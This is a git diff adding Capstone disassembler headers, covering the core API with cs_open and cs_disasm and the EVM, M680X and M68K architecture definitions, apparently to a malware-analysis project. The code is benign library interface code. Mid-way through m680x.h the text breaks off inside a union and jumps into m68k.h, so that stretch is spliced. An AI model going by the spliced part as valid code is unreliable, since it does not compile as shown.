*detail; +} cs_insn; + + +/// Calculate the offset of a disassembled instruction in its buffer, given its position +/// in its array of disassembled insn +/// NOTE: this macro works with position (>=1), not index +#define CS_INSN_OFFSET(insns, post) (insns[post - 1].address - insns[0].address) + + +/// All type of errors encountered by Capstone API. 
+/// These are values returned by cs_errno() +typedef enum cs_err { + CS_ERR_OK = 0, ///< No error: everything was fine + CS_ERR_MEM, ///< Out-Of-Memory error: cs_open(), cs_disasm(), cs_disasm_iter() + CS_ERR_ARCH, ///< Unsupported architecture: cs_open() + CS_ERR_HANDLE, ///< Invalid handle: cs_op_count(), cs_op_index() + CS_ERR_CSH, ///< Invalid csh argument: cs_close(), cs_errno(), cs_option() + CS_ERR_MODE, ///< Invalid/unsupported mode: cs_open() + CS_ERR_OPTION, ///< Invalid/unsupported option: cs_option() + CS_ERR_DETAIL, ///< Information is unavailable because detail option is OFF + CS_ERR_MEMSETUP, ///< Dynamic memory management uninitialized (see CS_OPT_MEM) + CS_ERR_VERSION, ///< Unsupported version (bindings) + CS_ERR_DIET, ///< Access irrelevant data in "diet" engine + CS_ERR_SKIPDATA, ///< Access irrelevant data for "data" instruction in SKIPDATA mode + CS_ERR_X86_ATT, ///< X86 AT&T syntax is unsupported (opt-out at compile time) + CS_ERR_X86_INTEL, ///< X86 Intel syntax is unsupported (opt-out at compile time) + CS_ERR_X86_MASM, ///< X86 Masm syntax is unsupported (opt-out at compile time) +} cs_err; + +/** + Return combined API version & major and minor version numbers. + + @major: major number of API version + @minor: minor number of API version + + @return hexical number as (major << 8 | minor), which encodes both + major & minor versions. + NOTE: This returned value can be compared with version number made + with macro CS_MAKE_VERSION + + For example, second API version would return 1 in @major, and 1 in @minor + The return value would be 0x0101 + + NOTE: if you only care about returned value, but not major and minor values, + set both @major & @minor arguments to NULL. +*/ +CAPSTONE_EXPORT +unsigned int CAPSTONE_API cs_version(int *major, int *minor); + + +/** + This API can be used to either ask for archs supported by this library, + or check to see if the library was compile with 'diet' option (or called + in 'diet' mode). 
+ + To check if a particular arch is supported by this library, set @query to + arch mode (CS_ARCH_* value). + To verify if this library supports all the archs, use CS_ARCH_ALL. + + To check if this library is in 'diet' mode, set @query to CS_SUPPORT_DIET. + + @return True if this library supports the given arch, or in 'diet' mode. +*/ +CAPSTONE_EXPORT +bool CAPSTONE_API cs_support(int query); + +/** + Initialize CS handle: this must be done before any usage of CS. + + @arch: architecture type (CS_ARCH_*) + @mode: hardware mode. This is combined of CS_MODE_* + @handle: pointer to handle, which will be updated at return time + + @return CS_ERR_OK on success, or other value on failure (refer to cs_err enum + for detailed error). +*/ +CAPSTONE_EXPORT +cs_err CAPSTONE_API cs_open(cs_arch arch, cs_mode mode, csh *handle); + +/** + Close CS handle: MUST do to release the handle when it is not used anymore. + NOTE: this must be only called when there is no longer usage of Capstone, + not even access to cs_insn array. The reason is the this API releases some + cached memory, thus access to any Capstone API after cs_close() might crash + your application. + + In fact,this API invalidate @handle by ZERO out its value (i.e *handle = 0). + + @handle: pointer to a handle returned by cs_open() + + @return CS_ERR_OK on success, or other value on failure (refer to cs_err enum + for detailed error). +*/ +CAPSTONE_EXPORT +cs_err CAPSTONE_API cs_close(csh *handle); + +/** + Set option for disassembling engine at runtime + + @handle: handle returned by cs_open() + @type: type of option to be set + @value: option value corresponding with @type + + @return: CS_ERR_OK on success, or other value on failure. + Refer to cs_err enum for detailed error. 
+ + NOTE: in the case of CS_OPT_MEM, handle's value can be anything, + so that cs_option(handle, CS_OPT_MEM, value) can (i.e must) be called + even before cs_open() +*/ +CAPSTONE_EXPORT +cs_err CAPSTONE_API cs_option(csh handle, cs_opt_type type, size_t value); + +/** + Report the last error number when some API function fail. + Like glibc's errno, cs_errno might not retain its old value once accessed. + + @handle: handle returned by cs_open() + + @return: error code of cs_err enum type (CS_ERR_*, see above) +*/ +CAPSTONE_EXPORT +cs_err CAPSTONE_API cs_errno(csh handle); + + +/** + Return a string describing given error code. + + @code: error code (see CS_ERR_* above) + + @return: returns a pointer to a string that describes the error code + passed in the argument @code +*/ +CAPSTONE_EXPORT +const char * CAPSTONE_API cs_strerror(cs_err code); + +/** + Disassemble binary code, given the code buffer, size, address and number + of instructions to be decoded. + This API dynamically allocate memory to contain disassembled instruction. + Resulting instructions will be put into @*insn + + NOTE 1: this API will automatically determine memory needed to contain + output disassembled instructions in @insn. + + NOTE 2: caller must free the allocated memory itself to avoid memory leaking. + + NOTE 3: for system with scarce memory to be dynamically allocated such as + OS kernel or firmware, the API cs_disasm_iter() might be a better choice than + cs_disasm(). The reason is that with cs_disasm(), based on limited available + memory, we have to calculate in advance how many instructions to be disassembled, + which complicates things. This is especially troublesome for the case @count=0, + when cs_disasm() runs uncontrollably (until either end of input buffer, or + when it encounters an invalid instruction). + + @handle: handle returned by cs_open() + @code: buffer containing raw binary code to be disassembled. + @code_size: size of the above code buffer. 
+ @address: address of the first instruction in given raw code buffer. + @insn: array of instructions filled in by this API. + NOTE: @insn will be allocated by this function, and should be freed + with cs_free() API. + @count: number of instructions to be disassembled, or 0 to get all of them + + @return: the number of successfully disassembled instructions, + or 0 if this function failed to disassemble the given code + + On failure, call cs_errno() for error code. +*/ +CAPSTONE_EXPORT +size_t CAPSTONE_API cs_disasm(csh handle, + const uint8_t *code, size_t code_size, + uint64_t address, + size_t count, + cs_insn **insn); + +/** + Deprecated function - to be retired in the next version! + Use cs_disasm() instead of cs_disasm_ex() +*/ +CAPSTONE_EXPORT +CAPSTONE_DEPRECATED +size_t CAPSTONE_API cs_disasm_ex(csh handle, + const uint8_t *code, size_t code_size, + uint64_t address, + size_t count, + cs_insn **insn); + +/** + Free memory allocated by cs_malloc() or cs_disasm() (argument @insn) + + @insn: pointer returned by @insn argument in cs_disasm() or cs_malloc() + @count: number of cs_insn structures returned by cs_disasm(), or 1 + to free memory allocated by cs_malloc(). +*/ +CAPSTONE_EXPORT +void CAPSTONE_API cs_free(cs_insn *insn, size_t count); + + +/** + Allocate memory for 1 instruction to be used by cs_disasm_iter(). + + @handle: handle returned by cs_open() + + NOTE: when no longer in use, you can reclaim the memory allocated for + this instruction with cs_free(insn, 1) +*/ +CAPSTONE_EXPORT +cs_insn * CAPSTONE_API cs_malloc(csh handle); + +/** + Fast API to disassemble binary code, given the code buffer, size, address + and number of instructions to be decoded. + This API puts the resulting instruction into a given cache in @insn. + See tests/test_iter.c for sample code demonstrating this API. + + NOTE 1: this API will update @code, @size & @address to point to the next + instruction in the input buffer. 
Therefore, it is convenient to use + cs_disasm_iter() inside a loop to quickly iterate all the instructions. + While decoding one instruction at a time can also be achieved with + cs_disasm(count=1), some benchmarks shown that cs_disasm_iter() can be 30% + faster on random input. + + NOTE 2: the cache in @insn can be created with cs_malloc() API. + + NOTE 3: for system with scarce memory to be dynamically allocated such as + OS kernel or firmware, this API is recommended over cs_disasm(), which + allocates memory based on the number of instructions to be disassembled. + The reason is that with cs_disasm(), based on limited available memory, + we have to calculate in advance how many instructions to be disassembled, + which complicates things. This is especially troublesome for the case + @count=0, when cs_disasm() runs uncontrollably (until either end of input + buffer, or when it encounters an invalid instruction). + + @handle: handle returned by cs_open() + @code: buffer containing raw binary code to be disassembled + @size: size of above code + @address: address of the first insn in given raw code buffer + @insn: pointer to instruction to be filled in by this API. + + @return: true if this API successfully decode 1 instruction, + or false otherwise. + + On failure, call cs_errno() for error code. +*/ +CAPSTONE_EXPORT +bool CAPSTONE_API cs_disasm_iter(csh handle, + const uint8_t **code, size_t *size, + uint64_t *address, cs_insn *insn); + +/** + Return friendly name of register in a string. + Find the instruction id from header file of corresponding architecture (arm.h for ARM, + x86.h for X86, ...) + + WARN: when in 'diet' mode, this API is irrelevant because engine does not + store register name. + + @handle: handle returned by cs_open() + @reg_id: register id + + @return: string name of the register, or NULL if @reg_id is invalid. 
+*/ +CAPSTONE_EXPORT +const char * CAPSTONE_API cs_reg_name(csh handle, unsigned int reg_id); + +/** + Return friendly name of an instruction in a string. + Find the instruction id from header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + + WARN: when in 'diet' mode, this API is irrelevant because the engine does not + store instruction name. + + @handle: handle returned by cs_open() + @insn_id: instruction id + + @return: string name of the instruction, or NULL if @insn_id is invalid. +*/ +CAPSTONE_EXPORT +const char * CAPSTONE_API cs_insn_name(csh handle, unsigned int insn_id); + +/** + Return friendly name of a group id (that an instruction can belong to) + Find the group id from header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + + WARN: when in 'diet' mode, this API is irrelevant because the engine does not + store group name. + + @handle: handle returned by cs_open() + @group_id: group id + + @return: string name of the group, or NULL if @group_id is invalid. +*/ +CAPSTONE_EXPORT +const char * CAPSTONE_API cs_group_name(csh handle, unsigned int group_id); + +/** + Check if a disassembled instruction belong to a particular group. + Find the group id from header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + Internally, this simply verifies if @group_id matches any member of insn->groups array. + + NOTE: this API is only valid when detail option is ON (which is OFF by default). + + WARN: when in 'diet' mode, this API is irrelevant because the engine does not + update @groups array. + + @handle: handle returned by cs_open() + @insn: disassembled instruction structure received from cs_disasm() or cs_disasm_iter() + @group_id: group that you want to check if this instruction belong to. + + @return: true if this instruction indeed belongs to the given group, or false otherwise. 
+*/ +CAPSTONE_EXPORT +bool CAPSTONE_API cs_insn_group(csh handle, const cs_insn *insn, unsigned int group_id); + +/** + Check if a disassembled instruction IMPLICITLY used a particular register. + Find the register id from header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + Internally, this simply verifies if @reg_id matches any member of insn->regs_read array. + + NOTE: this API is only valid when detail option is ON (which is OFF by default) + + WARN: when in 'diet' mode, this API is irrelevant because the engine does not + update @regs_read array. + + @insn: disassembled instruction structure received from cs_disasm() or cs_disasm_iter() + @reg_id: register that you want to check if this instruction used it. + + @return: true if this instruction indeed implicitly used the given register, or false otherwise. +*/ +CAPSTONE_EXPORT +bool CAPSTONE_API cs_reg_read(csh handle, const cs_insn *insn, unsigned int reg_id); + +/** + Check if a disassembled instruction IMPLICITLY modified a particular register. + Find the register id from header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + Internally, this simply verifies if @reg_id matches any member of insn->regs_write array. + + NOTE: this API is only valid when detail option is ON (which is OFF by default) + + WARN: when in 'diet' mode, this API is irrelevant because the engine does not + update @regs_write array. + + @insn: disassembled instruction structure received from cs_disasm() or cs_disasm_iter() + @reg_id: register that you want to check if this instruction modified it. + + @return: true if this instruction indeed implicitly modified the given register, or false otherwise. +*/ +CAPSTONE_EXPORT +bool CAPSTONE_API cs_reg_write(csh handle, const cs_insn *insn, unsigned int reg_id); + +/** + Count the number of operands of a given type. + Find the operand type in header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) 
+ + NOTE: this API is only valid when detail option is ON (which is OFF by default) + + @handle: handle returned by cs_open() + @insn: disassembled instruction structure received from cs_disasm() or cs_disasm_iter() + @op_type: Operand type to be found. + + @return: number of operands of given type @op_type in instruction @insn, + or -1 on failure. +*/ +CAPSTONE_EXPORT +int CAPSTONE_API cs_op_count(csh handle, const cs_insn *insn, unsigned int op_type); + +/** + Retrieve the position of operand of given type in .operands[] array. + Later, the operand can be accessed using the returned position. + Find the operand type in header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + + NOTE: this API is only valid when detail option is ON (which is OFF by default) + + @handle: handle returned by cs_open() + @insn: disassembled instruction structure received from cs_disasm() or cs_disasm_iter() + @op_type: Operand type to be found. + @position: position of the operand to be found. This must be in the range + [1, cs_op_count(handle, insn, op_type)] + + @return: index of operand of given type @op_type in .operands[] array + in instruction @insn, or -1 on failure. +*/ +CAPSTONE_EXPORT +int CAPSTONE_API cs_op_index(csh handle, const cs_insn *insn, unsigned int op_type, + unsigned int position); + +/// Type of array to keep the list of registers +typedef uint16_t cs_regs[64]; + +/** + Retrieve all the registers accessed by an instruction, either explicitly or + implicitly. + + WARN: when in 'diet' mode, this API is irrelevant because engine does not + store registers. + + @handle: handle returned by cs_open() + @insn: disassembled instruction structure returned from cs_disasm() or cs_disasm_iter() + @regs_read: on return, this array contains all registers read by instruction. + @regs_read_count: number of registers kept inside @regs_read array. + @regs_write: on return, this array contains all registers written by instruction. 
+ @regs_write_count: number of registers kept inside @regs_write array. + + @return CS_ERR_OK on success, or other value on failure (refer to cs_err enum + for detailed error). +*/ +CAPSTONE_EXPORT +cs_err CAPSTONE_API cs_regs_access(csh handle, const cs_insn *insn, + cs_regs regs_read, uint8_t *regs_read_count, + cs_regs regs_write, uint8_t *regs_write_count); + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/evm.h b/ai_anti_malware/capstone/include/capstone/evm.h new file mode 100644 index 0000000..78fb7c0 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/evm.h @@ -0,0 +1,188 @@ +#ifndef CAPSTONE_EVM_H +#define CAPSTONE_EVM_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2018 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// Instruction structure +typedef struct cs_evm { + unsigned char pop; ///< number of items popped from the stack + unsigned char push; ///< number of items pushed into the stack + unsigned int fee; ///< gas fee for the instruction +} cs_evm; + +/// EVM instruction +typedef enum evm_insn { + EVM_INS_STOP = 0, + EVM_INS_ADD = 1, + EVM_INS_MUL = 2, + EVM_INS_SUB = 3, + EVM_INS_DIV = 4, + EVM_INS_SDIV = 5, + EVM_INS_MOD = 6, + EVM_INS_SMOD = 7, + EVM_INS_ADDMOD = 8, + EVM_INS_MULMOD = 9, + EVM_INS_EXP = 10, + EVM_INS_SIGNEXTEND = 11, + EVM_INS_LT = 16, + EVM_INS_GT = 17, + EVM_INS_SLT = 18, + EVM_INS_SGT = 19, + EVM_INS_EQ = 20, + EVM_INS_ISZERO = 21, + EVM_INS_AND = 22, + EVM_INS_OR = 23, + EVM_INS_XOR = 24, + EVM_INS_NOT = 25, + EVM_INS_BYTE = 26, + EVM_INS_SHA3 = 32, + EVM_INS_ADDRESS = 48, + EVM_INS_BALANCE = 49, + EVM_INS_ORIGIN = 50, + EVM_INS_CALLER = 51, + EVM_INS_CALLVALUE = 52, + EVM_INS_CALLDATALOAD = 53, + EVM_INS_CALLDATASIZE = 54, + EVM_INS_CALLDATACOPY = 55, + EVM_INS_CODESIZE = 56, + EVM_INS_CODECOPY = 57, + EVM_INS_GASPRICE = 58, + EVM_INS_EXTCODESIZE = 59, + 
EVM_INS_EXTCODECOPY = 60, + EVM_INS_RETURNDATASIZE = 61, + EVM_INS_RETURNDATACOPY = 62, + EVM_INS_BLOCKHASH = 64, + EVM_INS_COINBASE = 65, + EVM_INS_TIMESTAMP = 66, + EVM_INS_NUMBER = 67, + EVM_INS_DIFFICULTY = 68, + EVM_INS_GASLIMIT = 69, + EVM_INS_POP = 80, + EVM_INS_MLOAD = 81, + EVM_INS_MSTORE = 82, + EVM_INS_MSTORE8 = 83, + EVM_INS_SLOAD = 84, + EVM_INS_SSTORE = 85, + EVM_INS_JUMP = 86, + EVM_INS_JUMPI = 87, + EVM_INS_PC = 88, + EVM_INS_MSIZE = 89, + EVM_INS_GAS = 90, + EVM_INS_JUMPDEST = 91, + EVM_INS_PUSH1 = 96, + EVM_INS_PUSH2 = 97, + EVM_INS_PUSH3 = 98, + EVM_INS_PUSH4 = 99, + EVM_INS_PUSH5 = 100, + EVM_INS_PUSH6 = 101, + EVM_INS_PUSH7 = 102, + EVM_INS_PUSH8 = 103, + EVM_INS_PUSH9 = 104, + EVM_INS_PUSH10 = 105, + EVM_INS_PUSH11 = 106, + EVM_INS_PUSH12 = 107, + EVM_INS_PUSH13 = 108, + EVM_INS_PUSH14 = 109, + EVM_INS_PUSH15 = 110, + EVM_INS_PUSH16 = 111, + EVM_INS_PUSH17 = 112, + EVM_INS_PUSH18 = 113, + EVM_INS_PUSH19 = 114, + EVM_INS_PUSH20 = 115, + EVM_INS_PUSH21 = 116, + EVM_INS_PUSH22 = 117, + EVM_INS_PUSH23 = 118, + EVM_INS_PUSH24 = 119, + EVM_INS_PUSH25 = 120, + EVM_INS_PUSH26 = 121, + EVM_INS_PUSH27 = 122, + EVM_INS_PUSH28 = 123, + EVM_INS_PUSH29 = 124, + EVM_INS_PUSH30 = 125, + EVM_INS_PUSH31 = 126, + EVM_INS_PUSH32 = 127, + EVM_INS_DUP1 = 128, + EVM_INS_DUP2 = 129, + EVM_INS_DUP3 = 130, + EVM_INS_DUP4 = 131, + EVM_INS_DUP5 = 132, + EVM_INS_DUP6 = 133, + EVM_INS_DUP7 = 134, + EVM_INS_DUP8 = 135, + EVM_INS_DUP9 = 136, + EVM_INS_DUP10 = 137, + EVM_INS_DUP11 = 138, + EVM_INS_DUP12 = 139, + EVM_INS_DUP13 = 140, + EVM_INS_DUP14 = 141, + EVM_INS_DUP15 = 142, + EVM_INS_DUP16 = 143, + EVM_INS_SWAP1 = 144, + EVM_INS_SWAP2 = 145, + EVM_INS_SWAP3 = 146, + EVM_INS_SWAP4 = 147, + EVM_INS_SWAP5 = 148, + EVM_INS_SWAP6 = 149, + EVM_INS_SWAP7 = 150, + EVM_INS_SWAP8 = 151, + EVM_INS_SWAP9 = 152, + EVM_INS_SWAP10 = 153, + EVM_INS_SWAP11 = 154, + EVM_INS_SWAP12 = 155, + EVM_INS_SWAP13 = 156, + EVM_INS_SWAP14 = 157, + EVM_INS_SWAP15 = 158, + EVM_INS_SWAP16 = 159, + 
EVM_INS_LOG0 = 160, + EVM_INS_LOG1 = 161, + EVM_INS_LOG2 = 162, + EVM_INS_LOG3 = 163, + EVM_INS_LOG4 = 164, + EVM_INS_CREATE = 240, + EVM_INS_CALL = 241, + EVM_INS_CALLCODE = 242, + EVM_INS_RETURN = 243, + EVM_INS_DELEGATECALL = 244, + EVM_INS_CALLBLACKBOX = 245, + EVM_INS_STATICCALL = 250, + EVM_INS_REVERT = 253, + EVM_INS_SUICIDE = 255, + + EVM_INS_INVALID = 512, + EVM_INS_ENDING, // <-- mark the end of the list of instructions +} evm_insn; + +/// Group of EVM instructions +typedef enum evm_insn_group { + EVM_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + EVM_GRP_JUMP, ///< all jump instructions + + EVM_GRP_MATH = 8, ///< math instructions + EVM_GRP_STACK_WRITE, ///< instructions write to stack + EVM_GRP_STACK_READ, ///< instructions read from stack + EVM_GRP_MEM_WRITE, ///< instructions write to memory + EVM_GRP_MEM_READ, ///< instructions read from memory + EVM_GRP_STORE_WRITE, ///< instructions write to storage + EVM_GRP_STORE_READ, ///< instructions read from storage + EVM_GRP_HALT, ///< instructions halt execution + + EVM_GRP_ENDING, ///< <-- mark the end of the list of groups +} evm_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/m680x.h b/ai_anti_malware/capstone/include/capstone/m680x.h new file mode 100644 index 0000000..c8296e4 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/m680x.h @@ -0,0 +1,537 @@ +#ifndef CAPSTONE_M680X_H +#define CAPSTONE_M680X_H + +/* Capstone Disassembly Engine */ +/* M680X Backend by Wolfgang Schwotzer 2017 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +#define M680X_OPERAND_COUNT 9 + +/// M680X registers and special registers +typedef enum m680x_reg { + M680X_REG_INVALID = 0, + + M680X_REG_A, ///< M6800/1/2/3/9, HD6301/9 + M680X_REG_B, ///< M6800/1/2/3/9, HD6301/9 + M680X_REG_E, ///< HD6309 + M680X_REG_F, ///< HD6309 + M680X_REG_0, ///< HD6309 + + M680X_REG_D, ///< 
M6801/3/9, HD6301/9 + M680X_REG_W, ///< HD6309 + + M680X_REG_CC, ///< M6800/1/2/3/9, M6301/9 + M680X_REG_DP, ///< M6809/M6309 + M680X_REG_MD, ///< M6309 + + M680X_REG_HX, ///< M6808 + M680X_REG_H, ///< M6808 + M680X_REG_X, ///< M6800/1/2/3/9, M6301/9 + M680X_REG_Y, ///< M6809/M6309 + M680X_REG_S, ///< M6809/M6309 + M680X_REG_U, ///< M6809/M6309 + M680X_REG_V, ///< M6309 + + M680X_REG_Q, ///< M6309 + + M680X_REG_PC, ///< M6800/1/2/3/9, M6301/9 + + M680X_REG_TMP2, ///< CPU12 + M680X_REG_TMP3, ///< CPU12 + + M680X_REG_ENDING, ///< <-- mark the end of the list of registers +} m680x_reg; + +/// Operand type for instruction's operands +typedef enum m680x_op_type { + M680X_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + M680X_OP_REGISTER, ///< = Register operand. + M680X_OP_IMMEDIATE, ///< = Immediate operand. + M680X_OP_INDEXED, ///< = Indexed addressing operand. + M680X_OP_EXTENDED, ///< = Extended addressing operand. + M680X_OP_DIRECT, ///< = Direct addressing operand. + M680X_OP_RELATIVE, ///< = Relative addressing operand. + M680X_OP_CONSTANT, ///< = constant operand (Displayed as number only). + ///< Used e.g. for a bit index or page number. +} m680x_op_type; + +// Supported bit values for mem.idx.offset_bits +#define M680X_OFFSET_NONE 0 +#define M680X_OFFSET_BITS_5 5 +#define M680X_OFFSET_BITS_8 8 +#define M680X_OFFSET_BITS_9 9 +#define M680X_OFFSET_BITS_16 16 + +// Supported bit flags for mem.idx.flags +// These flags can be combined +#define M680X_IDX_INDIRECT 1 +#define M680X_IDX_NO_COMMA 2 +#define M680X_IDX_POST_INC_DEC 4 + +/// Instruction's operand referring to indexed addressing +typedef struct m680x_op_idx { + m680x_reg base_reg; ///< base register (or M680X_REG_INVALID if + ///< irrelevant) + m680x_reg offset_reg; ///< offset register (or M680X_REG_INVALID if + ///< irrelevant) + int16_t offset; ///< 5-,8- or 16-bit offset. See also offset_bits. + uint16_t offset_addr; ///< = offset addr. if base_reg == M680X_REG_PC. 
+ ///< calculated as offset + PC + uint8_t offset_bits; ///< offset width in bits for indexed addressing + int8_t inc_dec; ///< inc. or dec. value: + ///< 0: no inc-/decrement + ///< 1 .. 8: increment by 1 .. 8 + ///< -1 .. -8: decrement by 1 .. 8 + ///< if flag M680X_IDX_POST_INC_DEC set it is post + ///< inc-/decrement otherwise pre inc-/decrement + uint8_t flags; ///< 8-bit flags (see above) +} m680x_op_idx; + +/// Instruction's memory operand referring to relative addressing (Bcc/LBcc) +typedef struct m680x_op_rel { + uint16_t address; ///< The absolute address. + ///< calculated as PC + offset. PC is the first + ///< address after the instruction. + int16_t offset; ///< the offset/displacement value +} m680x_op_rel; + +/// Instruction's operand referring to extended addressing +typedef struct m680x_op_ext { + uint16_t address; ///< The absolute address + bool indirect; ///< true if extended indirect addressing +} m680x_op_ext; + +/// Instruction operand +typedef struct cs_m680x_op { + m680x_op_type type; + union { + int32_t imm; ///< immediate value for IMM operand + m680x_reg reg; ///< register value for REG operand + m680x_op_idx idx; ///< Indexed addressing operand + m680x_op_rel rel; ///< Relative address. 
operand (Bcc/LBcc) + m680x_op_ext ext; ///< Extended address + uint8_t direct_addr; ///<, 2015-2016 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +#define M68K_OPERAND_COUNT 4 + +/// M68K registers and special registers +typedef enum m68k_reg { + M68K_REG_INVALID = 0, + + M68K_REG_D0, + M68K_REG_D1, + M68K_REG_D2, + M68K_REG_D3, + M68K_REG_D4, + M68K_REG_D5, + M68K_REG_D6, + M68K_REG_D7, + + M68K_REG_A0, + M68K_REG_A1, + M68K_REG_A2, + M68K_REG_A3, + M68K_REG_A4, + M68K_REG_A5, + M68K_REG_A6, + M68K_REG_A7, + + M68K_REG_FP0, + M68K_REG_FP1, + M68K_REG_FP2, + M68K_REG_FP3, + M68K_REG_FP4, + M68K_REG_FP5, + M68K_REG_FP6, + M68K_REG_FP7, + + M68K_REG_PC, + + M68K_REG_SR, + M68K_REG_CCR, + M68K_REG_SFC, + M68K_REG_DFC, + M68K_REG_USP, + M68K_REG_VBR, + M68K_REG_CACR, + M68K_REG_CAAR, + M68K_REG_MSP, + M68K_REG_ISP, + M68K_REG_TC, + M68K_REG_ITT0, + M68K_REG_ITT1, + M68K_REG_DTT0, + M68K_REG_DTT1, + M68K_REG_MMUSR, + M68K_REG_URP, + M68K_REG_SRP, + + M68K_REG_FPCR, + M68K_REG_FPSR, + M68K_REG_FPIAR, + + M68K_REG_ENDING, // <-- mark the end of the list of registers +} m68k_reg; + +/// M68K Addressing Modes +typedef enum m68k_address_mode { + M68K_AM_NONE = 0, ///< No address mode. 
+ + M68K_AM_REG_DIRECT_DATA, ///< Register Direct - Data + M68K_AM_REG_DIRECT_ADDR, ///< Register Direct - Address + + M68K_AM_REGI_ADDR, ///< Register Indirect - Address + M68K_AM_REGI_ADDR_POST_INC, ///< Register Indirect - Address with Postincrement + M68K_AM_REGI_ADDR_PRE_DEC, ///< Register Indirect - Address with Predecrement + M68K_AM_REGI_ADDR_DISP, ///< Register Indirect - Address with Displacement + + M68K_AM_AREGI_INDEX_8_BIT_DISP, ///< Address Register Indirect With Index- 8-bit displacement + M68K_AM_AREGI_INDEX_BASE_DISP, ///< Address Register Indirect With Index- Base displacement + + M68K_AM_MEMI_POST_INDEX, ///< Memory indirect - Postindex + M68K_AM_MEMI_PRE_INDEX, ///< Memory indirect - Preindex + + M68K_AM_PCI_DISP, ///< Program Counter Indirect - with Displacement + + M68K_AM_PCI_INDEX_8_BIT_DISP, ///< Program Counter Indirect with Index - with 8-Bit Displacement + M68K_AM_PCI_INDEX_BASE_DISP, ///< Program Counter Indirect with Index - with Base Displacement + + M68K_AM_PC_MEMI_POST_INDEX, ///< Program Counter Memory Indirect - Postindexed + M68K_AM_PC_MEMI_PRE_INDEX, ///< Program Counter Memory Indirect - Preindexed + + M68K_AM_ABSOLUTE_DATA_SHORT, ///< Absolute Data Addressing - Short + M68K_AM_ABSOLUTE_DATA_LONG, ///< Absolute Data Addressing - Long + M68K_AM_IMMEDIATE, ///< Immediate value + + M68K_AM_BRANCH_DISPLACEMENT, ///< Address as displacement from (PC+2) used by branches +} m68k_address_mode; + +/// Operand type for instruction's operands +typedef enum m68k_op_type { + M68K_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + M68K_OP_REG, ///< = CS_OP_REG (Register operand). + M68K_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + M68K_OP_MEM, ///< = CS_OP_MEM (Memory operand). 
+ M68K_OP_FP_SINGLE, ///< single precision Floating-Point operand + M68K_OP_FP_DOUBLE, ///< double precision Floating-Point operand + M68K_OP_REG_BITS, ///< Register bits move + M68K_OP_REG_PAIR, ///< Register pair in the same op (upper 4 bits for first reg, lower for second) + M68K_OP_BR_DISP, ///< Branch displacement +} m68k_op_type; + +/// Instruction's operand referring to memory +/// This is associated with M68K_OP_MEM operand type above +typedef struct m68k_op_mem { + m68k_reg base_reg; ///< base register (or M68K_REG_INVALID if irrelevant) + m68k_reg index_reg; ///< index register (or M68K_REG_INVALID if irrelevant) + m68k_reg in_base_reg; ///< indirect base register (or M68K_REG_INVALID if irrelevant) + uint32_t in_disp; ///< indirect displacement + uint32_t out_disp; ///< other displacement + int16_t disp; ///< displacement value + uint8_t scale; ///< scale for index register + uint8_t bitfield; ///< set to true if the two values below should be used + uint8_t width; ///< used for bf* instructions + uint8_t offset; ///< used for bf* instructions + uint8_t index_size; ///< 0 = w, 1 = l +} m68k_op_mem; + +/// Operand type for instruction's operands +typedef enum m68k_op_br_disp_size { + M68K_OP_BR_DISP_SIZE_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + M68K_OP_BR_DISP_SIZE_BYTE = 1, ///< signed 8-bit displacement + M68K_OP_BR_DISP_SIZE_WORD = 2, ///< signed 16-bit displacement + M68K_OP_BR_DISP_SIZE_LONG = 4, ///< signed 32-bit displacement +} m68k_op_br_disp_size; + +typedef struct m68k_op_br_disp { + int32_t disp; ///< displacement value + uint8_t disp_size; ///< Size from m68k_op_br_disp_size type above +} m68k_op_br_disp; + +/// Register pair in one operand. 
+typedef struct cs_m68k_op_reg_pair { + m68k_reg reg_0; + m68k_reg reg_1; +} cs_m68k_op_reg_pair; + +/// Instruction operand +typedef struct cs_m68k_op { + union { + uint64_t imm; ///< immediate value for IMM operand + double dimm; ///< double imm + float simm; ///< float imm + m68k_reg reg; ///< register value for REG operand + cs_m68k_op_reg_pair reg_pair; ///< register pair in one operand + }; + + m68k_op_mem mem; ///< data when operand is targeting memory + m68k_op_br_disp br_disp; ///< data when operand is a branch displacement + uint32_t register_bits; ///< register bits for movem etc. (always in d0-d7, a0-a7, fp0 - fp7 order) + m68k_op_type type; + m68k_address_mode address_mode; ///< M68K addressing mode for this op +} cs_m68k_op; + +/// Operation size of the CPU instructions +typedef enum m68k_cpu_size { + M68K_CPU_SIZE_NONE = 0, ///< unsized or unspecified + M68K_CPU_SIZE_BYTE = 1, ///< 1 byte in size + M68K_CPU_SIZE_WORD = 2, ///< 2 bytes in size + M68K_CPU_SIZE_LONG = 4, ///< 4 bytes in size +} m68k_cpu_size; + +/// Operation size of the FPU instructions (Notice that FPU instruction can also use CPU sizes if needed) +typedef enum m68k_fpu_size { + M68K_FPU_SIZE_NONE = 0, ///< unsized like fsave/frestore + M68K_FPU_SIZE_SINGLE = 4, ///< 4 byte in size (single float) + M68K_FPU_SIZE_DOUBLE = 8, ///< 8 byte in size (double) + M68K_FPU_SIZE_EXTENDED = 12, ///< 12 byte in size (extended real format) +} m68k_fpu_size; + +/// Type of size that is being used for the current instruction +typedef enum m68k_size_type { + M68K_SIZE_TYPE_INVALID = 0, + + M68K_SIZE_TYPE_CPU, + 